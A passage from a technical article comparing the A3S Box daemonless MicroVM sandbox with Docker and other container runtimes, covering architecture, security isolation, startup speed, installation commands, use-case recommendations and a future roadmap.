&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (52 commands)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;K8s integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CRI&lt;/td&gt;
&lt;td&gt;CRI&lt;/td&gt;
&lt;td&gt;CRI&lt;/td&gt;
&lt;td&gt;containerd-shim&lt;/td&gt;
&lt;td&gt;CRI&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Language&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Go&lt;/td&gt;
&lt;td&gt;Go&lt;/td&gt;
&lt;td&gt;Go + Rust&lt;/td&gt;
&lt;td&gt;Rust&lt;/td&gt;
&lt;td&gt;Rust&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Embedded SDK&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (Rust)&lt;/td&gt;
&lt;td&gt;Yes (Rust/Python/TS)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Audit logs&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (26 operations)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Warm pool&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (auto-scaling)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;RA-TLS&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Sealed storage&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (3 policies)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Daemon required&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes (dockerd)&lt;/td&gt;
&lt;td&gt;Yes (runsc)&lt;/td&gt;
&lt;td&gt;Yes (shimv2)&lt;/td&gt;
&lt;td&gt;Yes (firecracker)&lt;/td&gt;
&lt;td&gt;No daemon&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Binary size&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;~200 MB (full)&lt;/td&gt;
&lt;td&gt;~50 MB&lt;/td&gt;
&lt;td&gt;~100 MB+&lt;/td&gt;
&lt;td&gt;~30 MB&lt;/td&gt;
&lt;td&gt;~40 MB (single binary)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Dependencies&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;dockerd + containerd + runc&lt;/td&gt;
&lt;td&gt;containerd + runsc&lt;/td&gt;
&lt;td&gt;containerd + shimv2 + QEMU&lt;/td&gt;
&lt;td&gt;firecracker + jailer&lt;/td&gt;
&lt;td&gt;Single binary, zero external deps&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  20.3 A3S Box vs Docker: Deep Comparison
&lt;/h3&gt;

&lt;p&gt;Docker is the de facto standard of the container ecosystem and the tool most developers are familiar with. A deep comparison of A3S Box with Docker helps understand A3S Box's differentiated value.&lt;/p&gt;

&lt;h4&gt;
  
  
  20.3.1 Architecture Difference: Daemonless vs Daemon Model
&lt;/h4&gt;

&lt;p&gt;Docker uses a classic client-server architecture:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Docker architecture:
  docker CLI --&amp;gt; dockerd (daemon, always running in background)
                    |
                    +-- containerd (container lifecycle management)
                    |       |
                    |       +-- containerd-shim
                    |               |
                    |               +-- runc (OCI runtime)
                    |                     |
                    |                     +-- container process
                    |
                    +-- network/storage/logging plugins
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This architecture means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Must run &lt;code&gt;dockerd&lt;/code&gt; daemon (typically with root privileges)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;dockerd&lt;/code&gt; is a single point of failure — if the daemon crashes, management capability for all containers is lost&lt;/li&gt;
&lt;li&gt;The daemon itself is a high-value attack target (root privileges + controls all containers)&lt;/li&gt;
&lt;li&gt;Upgrading Docker requires restarting the daemon, potentially affecting running containers&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A3S Box uses a daemonless architecture:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;A3S Box architecture:
  a3s-box CLI --&amp;gt; directly starts shim subprocess
                        |
                        +-- libkrun (library call, not separate process)
                                |
                                +-- MicroVM (independent kernel)
                                        |
                                        +-- Guest Init (PID 1)
                                                |
                                                +-- application process
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Advantages of daemonless:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;No single point of failure&lt;/strong&gt;: Each MicroVM is managed by an independent shim subprocess; one VM's management process crashing doesn't affect other VMs&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No privileged daemon&lt;/strong&gt;: Eliminates the Docker daemon as a high-value attack target&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Zero operational overhead&lt;/strong&gt;: No need to manage daemon startup, monitoring, log rotation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ready to use&lt;/strong&gt;: No &lt;code&gt;systemctl start docker&lt;/code&gt; needed; just execute the command directly&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  20.3.2 Size Comparison: 40MB vs 200MB+
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Docker&lt;/th&gt;
&lt;th&gt;A3S Box&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CLI&lt;/td&gt;
&lt;td&gt;docker (~50 MB)&lt;/td&gt;
&lt;td&gt;a3s-box (~40 MB, includes all features)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Runtime daemon&lt;/td&gt;
&lt;td&gt;dockerd (~80 MB)&lt;/td&gt;
&lt;td&gt;Not needed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Container management&lt;/td&gt;
&lt;td&gt;containerd (~50 MB)&lt;/td&gt;
&lt;td&gt;Built-in&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OCI runtime&lt;/td&gt;
&lt;td&gt;runc (~10 MB)&lt;/td&gt;
&lt;td&gt;Built-in (libkrun)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network plugins&lt;/td&gt;
&lt;td&gt;CNI plugins (~20 MB)&lt;/td&gt;
&lt;td&gt;Built-in&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~200 MB+&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~40 MB&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;A3S Box compiles all functionality into a single Rust binary with no external dependencies. This means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Minimal deployment&lt;/strong&gt;: Copy one file to complete installation, no package manager needed&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Simple version management&lt;/strong&gt;: One binary = one version, no component version incompatibility issues&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Offline deployment friendly&lt;/strong&gt;: In environments without network, only need to transfer a 40MB file&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CI/CD cache efficient&lt;/strong&gt;: Caching one file is much faster than caching an entire Docker installation&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  20.3.3 Security Model Comparison
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Docker's isolation boundary:
+-------------------------------------+
|       Host Linux Kernel              |  &amp;lt;- All containers share this
|  +---------+  +---------+           |
|  | Cont. A  |  | Cont. B  |          |
|  | ns+cgroup|  | ns+cgroup|          |
|  +---------+  +---------+           |
|                                     |
|  Kernel vulnerability = all containers compromised  |
+-------------------------------------+

A3S Box's isolation boundary:
+-------------------------------------+
|       Host Linux Kernel              |
|  +--------------+  +--------------+ |
|  | MicroVM A     |  | MicroVM B     | |
|  | +----------+ |  | +----------+ | |
|  | |Indep.    | |  | |Indep.    | | |
|  | |kernel    | |  | |kernel    | | |
|  | |app proc  | |  | |app proc  | | |
|  | +----------+ |  | +----------+ | |
|  | HW virt boundary|  | HW virt boundary| |
|  +--------------+  +--------------+ |
|                                     |
|  VM A kernel vuln != VM B affected  |
+-------------------------------------+
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Key security differences:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Security Dimension&lt;/th&gt;
&lt;th&gt;Docker&lt;/th&gt;
&lt;th&gt;A3S Box&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Kernel sharing&lt;/td&gt;
&lt;td&gt;All containers share host kernel&lt;/td&gt;
&lt;td&gt;Each VM has independent kernel&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Escape impact&lt;/td&gt;
&lt;td&gt;One container escape -&amp;gt; control all containers&lt;/td&gt;
&lt;td&gt;One VM escape -&amp;gt; only affects that VM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Privileged daemon&lt;/td&gt;
&lt;td&gt;dockerd runs as root&lt;/td&gt;
&lt;td&gt;No daemon&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory encryption&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (TEE, SEV-SNP)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remote attestation&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (RA-TLS)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Audit logs&lt;/td&gt;
&lt;td&gt;Basic (Docker events)&lt;/td&gt;
&lt;td&gt;Complete (26 operations, W7 model)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Default Seccomp&lt;/td&gt;
&lt;td&gt;Allows ~300 syscalls&lt;/td&gt;
&lt;td&gt;Blocks 16 dangerous calls + arch validation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Default Capabilities&lt;/td&gt;
&lt;td&gt;Retains 14&lt;/td&gt;
&lt;td&gt;All stripped&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h4&gt;
  
  
  20.3.4 Startup Speed Comparison
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Docker container startup (~50ms):
  [0ms]  dockerd receives request
  [5ms]  containerd creates container
  [10ms] runc sets up namespace + cgroup
  [20ms] pivot_root switches root filesystem
  [30ms] application process starts
  [50ms] ready

A3S Box MicroVM startup (~200ms):
  [0ms]   CLI receives request
  [20ms]  start shim subprocess
  [50ms]  libkrun creates VM + kernel boot
  [150ms] Guest Init mounts filesystems
  [180ms] configure network + start vsock servers
  [200ms] ready

A3S Box warm pool mode (~0ms):
  [0ms]   CLI receives request
  [0ms]   acquire ready VM from warm pool
  [0ms]   ready
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Docker's startup speed is indeed faster (~50ms vs ~200ms), but the 150ms difference buys:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Upgrade from shared-kernel isolation to hardware virtualization isolation&lt;/li&gt;
&lt;li&gt;Optional TEE memory encryption&lt;/li&gt;
&lt;li&gt;Independent kernel (kernel vulnerabilities don't spread)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For latency-sensitive scenarios, the warm pool mechanism can reduce effective startup time to near zero.&lt;/p&gt;

&lt;h4&gt;
  
  
  20.3.5 Developer Experience Comparison
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;Docker&lt;/th&gt;
&lt;th&gt;A3S Box&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Installation&lt;/td&gt;
&lt;td&gt;Need to install Docker Desktop (macOS/Windows) or docker-ce (Linux)&lt;/td&gt;
&lt;td&gt;Download single binary, no installation needed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS support&lt;/td&gt;
&lt;td&gt;Via Docker Desktop (requires HyperKit/VZ virtualization layer)&lt;/td&gt;
&lt;td&gt;Native Apple HVF, no intermediate layer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command compat&lt;/td&gt;
&lt;td&gt;Native&lt;/td&gt;
&lt;td&gt;52 compatible commands, consistent syntax&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dockerfile&lt;/td&gt;
&lt;td&gt;Native support&lt;/td&gt;
&lt;td&gt;Compatible with OCI image format&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SDK embedding&lt;/td&gt;
&lt;td&gt;Via Docker API (HTTP REST)&lt;/td&gt;
&lt;td&gt;Native Rust/Python/TypeScript SDK&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Resource usage&lt;/td&gt;
&lt;td&gt;Docker Desktop resident memory ~1-2 GB&lt;/td&gt;
&lt;td&gt;No resident process, start on demand&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;License&lt;/td&gt;
&lt;td&gt;Docker Desktop requires payment for commercial use&lt;/td&gt;
&lt;td&gt;MIT open source&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;For developers, the cost of migrating from Docker to A3S Box is minimal:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Before migration&lt;/span&gt;
docker run &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="nt"&gt;--name&lt;/span&gt; web &lt;span class="nt"&gt;-p&lt;/span&gt; 8080:80 nginx
docker &lt;span class="nb"&gt;exec &lt;/span&gt;web curl localhost
docker logs web
docker stop web &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; docker &lt;span class="nb"&gt;rm &lt;/span&gt;web

&lt;span class="c"&gt;# After migration (just replace the command name)&lt;/span&gt;
a3s-box run &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="nt"&gt;--name&lt;/span&gt; web &lt;span class="nt"&gt;-p&lt;/span&gt; 8080:80 nginx
a3s-box &lt;span class="nb"&gt;exec &lt;/span&gt;web curl localhost
a3s-box logs web
a3s-box stop web &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; a3s-box &lt;span class="nb"&gt;rm &lt;/span&gt;web
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  20.3.6 Installation Method Comparison
&lt;/h4&gt;

&lt;p&gt;Docker installation varies by platform and typically requires multiple steps:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Docker on macOS -- requires downloading ~1GB Docker Desktop installer&lt;/span&gt;
&lt;span class="c"&gt;# 1. Download Docker Desktop .dmg&lt;/span&gt;
&lt;span class="c"&gt;# 2. Drag to install&lt;/span&gt;
&lt;span class="c"&gt;# 3. Start Docker Desktop (resident in background, uses 1-2 GB memory)&lt;/span&gt;
&lt;span class="c"&gt;# 4. Wait for dockerd to finish starting&lt;/span&gt;

&lt;span class="c"&gt;# Docker on Linux -- requires configuring apt/yum repository&lt;/span&gt;
curl &lt;span class="nt"&gt;-fsSL&lt;/span&gt; https://get.docker.com | sh
&lt;span class="nb"&gt;sudo &lt;/span&gt;systemctl &lt;span class="nb"&gt;enable&lt;/span&gt; &lt;span class="nt"&gt;--now&lt;/span&gt; docker
&lt;span class="nb"&gt;sudo &lt;/span&gt;usermod &lt;span class="nt"&gt;-aG&lt;/span&gt; docker &lt;span class="nv"&gt;$USER&lt;/span&gt;
&lt;span class="c"&gt;# Need to re-login to shell for changes to take effect&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A3S Box provides multiple lightweight installation methods, each completing in seconds:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Method 1: Homebrew (macOS / Linux)&lt;/span&gt;
brew tap A3S-Lab/homebrew-tap https://github.com/A3S-Lab/homebrew-tap.git
brew &lt;span class="nb"&gt;install &lt;/span&gt;a3s-box
&lt;span class="c"&gt;# Automatically downloads pre-compiled binary from GitHub Releases&lt;/span&gt;
&lt;span class="c"&gt;# Includes a3s-box CLI + a3s-box-shim + a3s-box-guest-init&lt;/span&gt;
&lt;span class="c"&gt;# Done. No daemon, no restart needed, immediately usable.&lt;/span&gt;

&lt;span class="c"&gt;# Method 2: Cargo (Rust developers)&lt;/span&gt;
cargo &lt;span class="nb"&gt;install &lt;/span&gt;a3s-box
&lt;span class="c"&gt;# Compile and install from source, automatically gets latest version&lt;/span&gt;

&lt;span class="c"&gt;# Method 3: Helm (Kubernetes cluster)&lt;/span&gt;
helm repo add a3s https://a3s-lab.github.io/charts
helm &lt;span class="nb"&gt;install &lt;/span&gt;a3s-box a3s/a3s-box
&lt;span class="c"&gt;# Deploy as DaemonSet in K8s cluster, automatically runs on each node&lt;/span&gt;

&lt;span class="c"&gt;# Method 4: Direct binary download (GitHub Releases)&lt;/span&gt;
&lt;span class="c"&gt;# macOS Apple Silicon:&lt;/span&gt;
curl &lt;span class="nt"&gt;-L&lt;/span&gt; https://github.com/A3S-Lab/Box/releases/latest/download/a3s-box-latest-macos-arm64.tar.gz | &lt;span class="nb"&gt;tar &lt;/span&gt;xz
&lt;span class="c"&gt;# Linux x86_64:&lt;/span&gt;
curl &lt;span class="nt"&gt;-L&lt;/span&gt; https://github.com/A3S-Lab/Box/releases/latest/download/a3s-box-latest-linux-x86_64.tar.gz | &lt;span class="nb"&gt;tar &lt;/span&gt;xz
./a3s-box version
&lt;span class="c"&gt;# Extract and use, zero dependencies&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Installation Method&lt;/th&gt;
&lt;th&gt;Use Case&lt;/th&gt;
&lt;th&gt;Install Time&lt;/th&gt;
&lt;th&gt;Dependencies&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Homebrew&lt;/td&gt;
&lt;td&gt;macOS/Linux daily development&lt;/td&gt;
&lt;td&gt;~10 seconds&lt;/td&gt;
&lt;td&gt;Homebrew&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cargo&lt;/td&gt;
&lt;td&gt;Rust developers, source compilation&lt;/td&gt;
&lt;td&gt;~2 minutes&lt;/td&gt;
&lt;td&gt;Rust toolchain&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Helm&lt;/td&gt;
&lt;td&gt;Kubernetes cluster deployment&lt;/td&gt;
&lt;td&gt;~30 seconds&lt;/td&gt;
&lt;td&gt;Helm + K8s&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Direct download&lt;/td&gt;
&lt;td&gt;CI/CD, offline environments, edge devices&lt;/td&gt;
&lt;td&gt;~5 seconds&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;For more installation details and configuration options, see the official documentation: &lt;a href="https://a3s-lab.github.io/a3s/" rel="noopener noreferrer"&gt;https://a3s-lab.github.io/a3s/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Compared to Docker Desktop's installation experience (download 1GB -&amp;gt; install -&amp;gt; start daemon -&amp;gt; wait for ready), A3S Box's installation can be summarized in one word: &lt;strong&gt;instant&lt;/strong&gt;.&lt;/p&gt;

&lt;h4&gt;
  
  
  20.3.7 When to Choose Docker, When to Choose A3S Box?
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Choose Docker when:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Extremely latency-sensitive (P99 &amp;lt; 100ms) and not using warm pool&lt;/li&gt;
&lt;li&gt;Deep integration with Docker API toolchain with high migration cost&lt;/li&gt;
&lt;li&gt;Hardware-level isolation not needed (e.g., internal development environments, trusted workloads)&lt;/li&gt;
&lt;li&gt;Need Docker Compose to orchestrate multi-container applications&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Choose A3S Box when:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Running untrusted code (AI Agents, user-submitted code, third-party plugins)&lt;/li&gt;
&lt;li&gt;Multi-tenant environments requiring strong isolation guarantees&lt;/li&gt;
&lt;li&gt;Processing sensitive data requiring TEE confidential computing&lt;/li&gt;
&lt;li&gt;Need complete audit trail (compliance requirements)&lt;/li&gt;
&lt;li&gt;macOS development environment without wanting to install Docker Desktop&lt;/li&gt;
&lt;li&gt;Edge/IoT deployment requiring minimal binary size&lt;/li&gt;
&lt;li&gt;Need to embed sandbox capability into applications (SDK integration)&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  20.4 Scenario Applicability Analysis
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Scenario 1: Development and Testing Environments&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Recommended: A3S Box (TSI mode) or Docker&lt;/p&gt;

&lt;p&gt;A3S Box provides native support on macOS via Apple HVF; developers don't need to install Docker Desktop. 52 compatible commands make migration cost nearly zero. TSI network mode requires zero configuration, suitable for rapid iteration.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Scenario 2: Multi-Tenant SaaS Platforms&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Recommended: A3S Box (Bridge mode + TEE)&lt;/p&gt;

&lt;p&gt;Multi-tenant scenarios require strong isolation guarantees. A3S Box's hardware virtualization + TEE memory encryption provides the highest level of tenant isolation. Network policies support traffic isolation between tenants. Audit logs meet compliance requirements.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Scenario 3: AI Agent Sandbox Execution&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Recommended: A3S Box (warm pool + SDK)&lt;/p&gt;

&lt;p&gt;AI Agents need to execute untrusted code in isolated environments. A3S Box's SDK provides a unified programming interface for Rust/Python/TypeScript, and the warm pool mechanism eliminates cold start latency. The seven-layer security model ensures that even if Agent-generated code is malicious, it cannot escape the sandbox.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Scenario 4: Confidential Data Processing&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Recommended: A3S Box (TEE mode + sealed storage)&lt;/p&gt;

&lt;p&gt;When processing medical records, financial data, or personal privacy information, TEE mode ensures data remains encrypted throughout processing. RA-TLS provides end-to-end attestation and encrypted communication. Sealed storage ensures persisted data can only be decrypted in trusted environments.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Scenario 5: High-Performance Computing / Low-Latency Services&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Recommended: runc (Docker) or gVisor&lt;/p&gt;

&lt;p&gt;If security isolation is not the primary requirement and latency is extremely sensitive (P99 &amp;lt; 10ms), traditional containers' ~50ms startup time and lower runtime overhead may be more appropriate.&lt;/p&gt;

&lt;h3&gt;
  
  
  20.5 A3S Box's Unique Positioning
&lt;/h3&gt;

&lt;p&gt;From the comparison, A3S Box's unique positioning is:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;The only solution supporting both MicroVM isolation and TEE confidential computing&lt;/strong&gt;: Kata Containers has limited TEE support, but not as complete as A3S Box (lacking RA-TLS, sealed storage, re-attestation)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The only MicroVM solution with native macOS support&lt;/strong&gt;: Through libkrun + Apple HVF, developers can get an experience on Mac consistent with Linux production environments&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The only MicroVM solution providing three-language SDKs&lt;/strong&gt;: Rust/Python/TypeScript SDKs allow A3S Box to be embedded into applications as a library, not just a command-line tool&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The only MicroVM solution with a built-in complete audit system&lt;/strong&gt;: 26 audit operations, W7 model, pluggable backend&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  21. Future Outlook and Summary
&lt;/h2&gt;

&lt;h3&gt;
  
  
  21.1 Technical Evolution Roadmap
&lt;/h3&gt;

&lt;p&gt;A3S Box's technical evolution revolves around three directions:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Direction 1: Expand TEE Hardware Support&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A3S Box currently fully supports AMD SEV-SNP. Intel TDX (Trust Domain Extensions) support has been reserved in the architecture (the &lt;code&gt;TeeConfig::Tdx&lt;/code&gt; variant is already defined) and will be implemented when Intel server platforms are more widely deployed. Future attention will also be paid to emerging confidential computing standards like ARM CCA (Confidential Compute Architecture).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Direction 2: Enhanced Network Policy Enforcement&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The current network policies (&lt;code&gt;IsolationMode::Strict&lt;/code&gt; and &lt;code&gt;Custom&lt;/code&gt;) are fully defined in the data model, but runtime enforcement is not yet implemented. Future work will implement true network policy enforcement via iptables/nftables integration, supporting:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Fine-grained traffic control between MicroVMs&lt;/li&gt;
&lt;li&gt;Label-based network segmentation&lt;/li&gt;
&lt;li&gt;Port-level filtering of inbound/outbound traffic&lt;/li&gt;
&lt;li&gt;Semantic alignment with Kubernetes NetworkPolicy&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Direction 3: Deepening Security Capabilities&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Custom Seccomp profiles&lt;/strong&gt;: Currently supports &lt;code&gt;Default&lt;/code&gt; and &lt;code&gt;Unconfined&lt;/code&gt; modes; future will support &lt;code&gt;Custom&lt;/code&gt; mode, allowing users to provide custom Seccomp BPF profiles&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AppArmor / SELinux integration&lt;/strong&gt;: The CLI currently parses these options but doesn't enforce them; future will implement complete MAC (Mandatory Access Control) integration&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Image signature mandatory verification&lt;/strong&gt;: The signature verification framework is ready (&lt;code&gt;SignaturePolicy&lt;/code&gt;, &lt;code&gt;VerifyResult&lt;/code&gt;); future will integrate with the Sigstore/cosign ecosystem&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  21.2 Ecosystem Expansion
&lt;/h3&gt;

